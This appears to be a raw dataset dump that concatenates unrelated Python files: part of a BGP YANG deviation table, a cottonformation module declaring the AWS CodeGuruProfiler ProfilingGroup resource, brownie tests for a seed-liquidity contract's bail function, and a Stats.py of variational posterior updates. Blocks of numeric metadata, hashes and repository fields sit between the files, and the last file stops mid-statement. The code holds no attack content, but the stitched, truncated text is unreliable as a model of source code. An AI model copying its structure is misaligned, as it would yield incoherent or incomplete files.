'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.UseMultiplePaths.Ibgp' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.Config.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.Config.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.State.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.State.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Config.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Config.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.ErrorHandling.Config.treat_as_withdraw' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.ErrorHandling.State.treat_as_withdraw' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.GracefulRestart.Config.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.GracefulRestart.State.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.LoggingOptions.Config.log_neighbor_state_changes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.LoggingOptions.State.log_neighbor_state_changes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.total_paths' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.total_prefixes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Timers.Config.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Timers.State.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Transport.Config.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Transport.State.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.UseMultiplePaths' : {
'deviation_typ' : 'not_supported',
},
}
| 38.528544
| 183
| 0.605484
| 5,426
| 60,066
| 6.419278
| 0.024512
| 0.097844
| 0.077517
| 0.113692
| 0.987511
| 0.985903
| 0.985588
| 0.980965
| 0.968792
| 0.909161
| 0
| 0.009661
| 0.252123
| 60,066
| 1,558
| 184
| 38.553273
| 0.765705
| 0
| 0
| 0.506752
| 0
| 0
| 0.633813
| 0.407792
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004502
| 0
| 0.004502
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79577b021b7614f443da02698bcfa0027a4ad293
| 5,993
|
py
|
Python
|
cottonformation/res/codeguruprofiler.py
|
MacHu-GWU/cottonformation-project
|
23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b
|
[
"BSD-2-Clause"
] | 5
|
2021-07-22T03:45:59.000Z
|
2021-12-17T21:07:14.000Z
|
cottonformation/res/codeguruprofiler.py
|
MacHu-GWU/cottonformation-project
|
23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b
|
[
"BSD-2-Clause"
] | 1
|
2021-06-25T18:01:31.000Z
|
2021-06-25T18:01:31.000Z
|
cottonformation/res/codeguruprofiler.py
|
MacHu-GWU/cottonformation-project
|
23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b
|
[
"BSD-2-Clause"
] | 2
|
2021-06-27T03:08:21.000Z
|
2021-06-28T22:15:51.000Z
|
# -*- coding: utf-8 -*-
"""
This module declares the AWS::CodeGuruProfiler resources and property types for use in CloudFormation templates.
"""
import attr
import typing
from ..core.model import (
Property, Resource, Tag, GetAtt, TypeHint, TypeCheck,
)
from ..core.constant import AttrMeta
#--- Property declaration ---
@attr.s
class PropProfilingGroupChannel(Property):
"""
AWS Object Type = "AWS::CodeGuruProfiler::ProfilingGroup.Channel"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html
Property Document:
- ``rp_channelUri``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channeluri
- ``p_channelId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channelid
"""
AWS_OBJECT_TYPE = "AWS::CodeGuruProfiler::ProfilingGroup.Channel"
rp_channelUri: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "channelUri"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channeluri"""
p_channelId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "channelId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channelid"""
#--- Resource declaration ---
@attr.s
class ProfilingGroup(Resource):
"""
AWS Object Type = "AWS::CodeGuruProfiler::ProfilingGroup"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html
Property Document:
- ``rp_ProfilingGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-profilinggroupname
- ``p_AgentPermissions``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-agentpermissions
- ``p_AnomalyDetectionNotificationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-anomalydetectionnotificationconfiguration
- ``p_ComputePlatform``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-computeplatform
- ``p_Tags``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-tags
"""
AWS_OBJECT_TYPE = "AWS::CodeGuruProfiler::ProfilingGroup"
rp_ProfilingGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ProfilingGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-profilinggroupname"""
p_AgentPermissions: dict = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(dict)),
metadata={AttrMeta.PROPERTY_NAME: "AgentPermissions"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-agentpermissions"""
p_AnomalyDetectionNotificationConfiguration: typing.List[typing.Union['PropProfilingGroupChannel', dict]] = attr.ib(
default=None,
converter=PropProfilingGroupChannel.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropProfilingGroupChannel), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "AnomalyDetectionNotificationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-anomalydetectionnotificationconfiguration"""
p_ComputePlatform: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ComputePlatform"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-computeplatform"""
p_Tags: typing.List[typing.Union[Tag, dict]] = attr.ib(
default=None,
converter=Tag.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(Tag), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "Tags"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-tags"""
@property
def rv_Arn(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#aws-resource-codeguruprofiler-profilinggroup-return-values"""
return GetAtt(resource=self, attr_name="Arn")
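For reference, the attrs declaration above serializes to a standard CloudFormation resource. The snippet below is an illustrative sketch only: it shows the JSON shape implied by the AWS_OBJECT_TYPE and PROPERTY_NAME metadata, with example property values that are not taken from the source.

# Illustrative only: the CloudFormation resource shape implied by the metadata above.
example_profiling_group = {
    "Type": "AWS::CodeGuruProfiler::ProfilingGroup",
    "Properties": {
        "ProfilingGroupName": "my-profiling-group",  # maps to rp_ProfilingGroupName (required)
        "ComputePlatform": "Default",                # maps to p_ComputePlatform (optional)
        "Tags": [{"Key": "env", "Value": "dev"}],    # maps to p_Tags (optional)
    },
}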
| 57.625
| 244
| 0.776406
| 604
| 5,993
| 7.610927
| 0.124172
| 0.234936
| 0.040679
| 0.062867
| 0.841853
| 0.840983
| 0.807918
| 0.78486
| 0.78486
| 0.78486
| 0
| 0.000185
| 0.100451
| 5,993
| 103
| 245
| 58.184466
| 0.852532
| 0.347572
| 0
| 0.25
| 0
| 0
| 0.087417
| 0.058016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019231
| false
| 0
| 0.076923
| 0
| 0.326923
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
795aca3bd791cdcef8635e8c9a29afeba89d6acb
| 2,532
|
py
|
Python
|
tests/test_bail.py
|
1Blackdiamondsc/seed-liquidity
|
91e08c1a0bfa8115db38a23d236c22dcddf039af
|
[
"MIT"
] | 55
|
2020-12-18T15:34:11.000Z
|
2022-03-27T12:50:09.000Z
|
tests/test_bail.py
|
1Blackdiamondsc/seed-liquidity
|
91e08c1a0bfa8115db38a23d236c22dcddf039af
|
[
"MIT"
] | null | null | null |
tests/test_bail.py
|
1Blackdiamondsc/seed-liquidity
|
91e08c1a0bfa8115db38a23d236c22dcddf039af
|
[
"MIT"
] | 17
|
2020-12-18T14:36:32.000Z
|
2022-02-10T17:41:12.000Z
|
import brownie
def test_bail_seed_running(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
with brownie.reverts():
seed.bail({'from': agent})
with brownie.reverts():
seed.bail({'from': whale})
def test_bail_targets_met_expired(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
def test_bail_targets_not_met(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)//2
weth_amount = seed.target(1)*3//4
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
with brownie.reverts():
seed.provide()
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
def test_bail_targets_met_expired_multi_deposit(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount//2, 0], {'from': agent})
seed.deposit([lido_amount//2, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
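The fixtures used above (seed, lido, weth, agent, whale, chain) come from a conftest.py that is not part of this file. A hypothetical sketch of such fixtures is given below; the contract name SeedLiquidity, its constructor arguments, and the token fixtures are invented for illustration and are not taken from the repository.

# Hypothetical conftest.py sketch -- fixture wiring only; contract name and
# constructor arguments are illustrative, not the project's actual setup.
import pytest

@pytest.fixture
def agent(accounts):
    # brownie's built-in ``accounts`` fixture supplies funded local accounts
    return accounts[0]

@pytest.fixture
def whale(accounts):
    return accounts[1]

@pytest.fixture
def seed(SeedLiquidity, lido, weth, agent):
    # ``SeedLiquidity`` stands in for the project's contract container fixture;
    # ``lido`` and ``weth`` are assumed to be token fixtures defined elsewhere.
    # Assumed constructor: the token pair plus the 14-day window used in the tests.
    return SeedLiquidity.deploy([lido, weth], 14 * 86400, {"from": agent})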
| 29.44186
| 87
| 0.657583
| 345
| 2,532
| 4.66087
| 0.104348
| 0.099502
| 0.068408
| 0.069652
| 0.954602
| 0.941542
| 0.894279
| 0.894279
| 0.873756
| 0.873756
| 0
| 0.02419
| 0.183649
| 2,532
| 86
| 88
| 29.44186
| 0.753749
| 0
| 0
| 0.866667
| 0
| 0
| 0.031583
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.066667
| false
| 0
| 0.016667
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dbfe3713d63847ad2350264da0aea47929c6753
| 20,051
|
py
|
Python
|
src/Stats.py
|
jtaghia/MRGP
|
92891dfb74e4322341ac3e7774d98eeb557ab215
|
[
"MIT"
] | 1
|
2021-05-27T09:31:48.000Z
|
2021-05-27T09:31:48.000Z
|
src/Stats.py
|
jtaghia/MRGP
|
92891dfb74e4322341ac3e7774d98eeb557ab215
|
[
"MIT"
] | 2
|
2021-07-14T03:36:11.000Z
|
2021-07-14T03:40:00.000Z
|
src/Stats.py
|
jtaghia/MRGP
|
92891dfb74e4322341ac3e7774d98eeb557ab215
|
[
"MIT"
] | 1
|
2021-07-12T21:08:44.000Z
|
2021-07-12T21:08:44.000Z
|
import numpy as np
from scipy.special import psi, gammaln, logsumexp  # logsumexp moved here from scipy.misc in modern SciPy
from scipy.optimize import fsolve
class Stats(object):
def __init__(self, posterior):
qd = posterior
self.noise_region_specific = qd.noise_region_specific
self.bias_region_specific = qd.bias_region_specific
self.latent_f_mean = None
self.latent_f_var = None
self.n_basis = qd.n_basis
self.dy = qd.dy
self.n_regions = qd.n_regions
# SCALE
self.scale_axis_mean = []
self.scale_moment2 = []
self.scale_axis_central_moment2 = []
for l in range(self.n_regions):
self.scale_axis_mean.append(np.zeros((self.dy, self.n_basis)))
self.scale_moment2.append(np.zeros(self.n_basis))
self.scale_axis_central_moment2.append(np.zeros(self.n_basis))
# NOISE
if qd.noise_region_specific is True:
self.noise_mean = []
self.noise_log_mean = []
for l in range(self.n_regions):
self.noise_mean.append(qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l])
self.noise_log_mean.append(psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l]))
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('noise_region_specific condition can be either True or False!')
# BIAS
if qd.bias_region_specific is True:
self.bias_mean = []
self.bias_var = []
for l in range(self.n_regions):
self.bias_mean.append(qd.bias_normal_mean[l])
self.bias_var.append(qd.bias_normal_precision[l]**-1)
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('bias_region_specific condition can be either True or False!')
# LATENT FUNCTIONS
def initialize_latent_functions(self, n_samps):
self.latent_f_mean = []
self.latent_f_var = []
for l in range(self.n_regions):
self.latent_f_mean.append(np.zeros((n_samps[l], self.dy)))
self.latent_f_var.append(np.zeros(n_samps[l]))
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
def update_scale(self, posterior, stats):
self._update_scale_axis_mean(posterior, stats)
self._update_scale_moment2(posterior, stats)
self._update_scale_axis_central_moment2(posterior, stats)
def _update_scale_axis_mean(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
self.scale_axis_mean[l][:, i] = qd.scale_mean_zeta[l][i] * \
np.dot(axis_cov[i, :, :], qd.scale_mean_y_tilde[l][:, i])
def _update_scale_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
self.scale_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(np.outer(y_tilde_il, y_tilde_il), axis_cov[i, :, :])))
def _update_scale_axis_central_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
term_ = axis_cov[i, :, :] - np.dot(axis_cov[i, :, :], axis_cov[i, :, :])
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
yy_tilde = np.outer(y_tilde_il, y_tilde_il)
self.scale_axis_central_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(yy_tilde, term_)))
def update_noise(self, posterior):
qd = posterior
if qd.noise_region_specific is True:
for l in range(self.n_regions):
self.noise_mean[l] = qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l]
self.noise_log_mean[l] = psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l])
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('Unsupported condition for noise_region_specific.')
def update_bias(self, posterior):
qd = posterior
if qd.bias_region_specific is True:
for l in range(self.n_regions):
self.bias_mean[l] = qd.bias_normal_mean[l]
self.bias_var[l] = qd.bias_normal_precision[l]**-1
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('Unsupported condition for bias_region_specific.')
def update_latent_functions(self, resolution, index_set, stats, phi_x):
n_samps_0 = len(index_set[0][0])
latent_f_mean = np.zeros((n_samps_0, self.dy))
latent_f_var = np.zeros(n_samps_0)
# TODO: which one?
for jp in range(resolution):
stats_jp = stats[jp]
phi_x_jp = phi_x[jp]
latent_f_mean_temp = []
latent_f_var_temp = []
for l in range(stats_jp.n_regions):
if stats_jp.bias_region_specific is True:
bias_mean = stats_jp.bias_mean[l]
bias_var = stats_jp.bias_var[l]
else:
bias_mean = stats_jp.bias_mean
bias_var = stats_jp.bias_var
n_samps = phi_x_jp[l].shape[0]
sum_term_mean = np.zeros((n_samps, stats_jp.dy))
sum_term_var = np.zeros(n_samps)
for i in range(self.n_basis):
sum_term_mean += stats_jp.scale_axis_mean[l][:, i] * \
np.tile(phi_x_jp[l][:, i], (self.dy, 1)).T
sum_term_var += (phi_x_jp[l][:, i]**2) * stats_jp.scale_axis_central_moment2[l][i]
latent_f_mean_temp.append(bias_mean + sum_term_mean)
latent_f_var_temp.append(bias_var + sum_term_var)
latent_f_mean += np.concatenate(latent_f_mean_temp)
latent_f_var += np.concatenate(latent_f_var_temp)
latent_f_var = np.atleast_2d(latent_f_var).T
for region in range(len(index_set[resolution])):
self.latent_f_mean[region] = latent_f_mean[index_set[resolution][region], :]
self.latent_f_var[region] = latent_f_var[index_set[resolution][region], :]
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
class IndependentStats(object):
def __init__(self, posterior):
qd = posterior
self.n_basis = qd.n_basis
self.dy = qd.dy
self.n_regions = qd.n_regions
# AXIS
self.axis_cov = []
for l in range(self.n_regions):
self.axis_cov.append(np.zeros((self.n_basis, self.dy, self.dy)))
# ARD
self.ard_mean = []
self.ard_log_mean = []
for l in range(self.n_regions):
self.ard_mean.append(qd.ard_gamma_shape[l] / qd.ard_gamma_scale[l])
self.ard_log_mean.append(psi(qd.ard_gamma_shape[l]) - np.log(qd.ard_gamma_scale[l]))
# PERMUTATION ALIGNMENT
self.omega = []
for l in range(self.n_regions):
self.omega.append(np.ones((self.n_basis, self.n_basis)) / self.n_basis)
self.noise_region_specific = qd.noise_region_specific
self.bias_region_specific = qd.bias_region_specific
self.latent_f_mean = None
self.latent_f_var = None
# SCALE
self.scale_axis_mean = []
self.scale_moment2 = []
self.scale_axis_central_moment2 = []
for l in range(self.n_regions):
self.scale_axis_mean.append(np.zeros((self.dy, self.n_basis)))
self.scale_moment2.append(np.zeros(self.n_basis))
self.scale_axis_central_moment2.append(np.zeros(self.n_basis))
# NOISE
if qd.noise_region_specific is True:
self.noise_mean = []
self.noise_log_mean = []
for l in range(self.n_regions):
self.noise_mean.append(qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l])
self.noise_log_mean.append(psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l]))
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('noise_region_specific condition can be either True or False!')
# BIAS
if qd.bias_region_specific is True:
self.bias_mean = []
self.bias_var = []
for l in range(self.n_regions):
self.bias_mean.append(qd.bias_normal_mean[l])
self.bias_var.append(qd.bias_normal_precision[l]**-1)
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('bias_region_specific condition can be either True or False!')
# LATENT FUNCTIONS
def initialize_latent_functions(self, n_samps):
self.latent_f_mean = []
self.latent_f_var = []
for l in range(self.n_regions):
self.latent_f_mean.append(np.zeros((n_samps[l], self.dy)))
self.latent_f_var.append(np.zeros(n_samps[l]))
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# UPDATE AXIS
def update_axis(self, posterior):
qd = posterior
for l in range(self.n_regions):
for i in range(self.n_basis):
sum_d = np.zeros((self.dy, self.dy))
for d in range(self.dy):
sum_d += qd.axis_bingham_rho[l][i, d] * \
np.outer(qd.axis_bingham_axes[l][i, :, d], qd.axis_bingham_axes[l][i, :, d])
self.axis_cov[l][i, :, :] = sum_d
# UPDATE ARD
def update_ard(self, posterior):
qd = posterior
for l in range(self.n_regions):
self.ard_mean[l] = qd.ard_gamma_shape[l]/qd.ard_gamma_scale[l]
self.ard_log_mean[l] = psi(qd.ard_gamma_shape[l]) - np.log(qd.ard_gamma_scale[l])
def update_scale(self, posterior, stats):
self._update_scale_axis_mean(posterior, stats)
self._update_scale_moment2(posterior, stats)
self._update_scale_axis_central_moment2(posterior, stats)
def _update_scale_axis_mean(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
self.scale_axis_mean[l][:, i] = qd.scale_mean_zeta[l][i] * \
np.dot(axis_cov[l][i, :, :], qd.scale_mean_y_tilde[l][:, i])
def _update_scale_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
self.scale_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
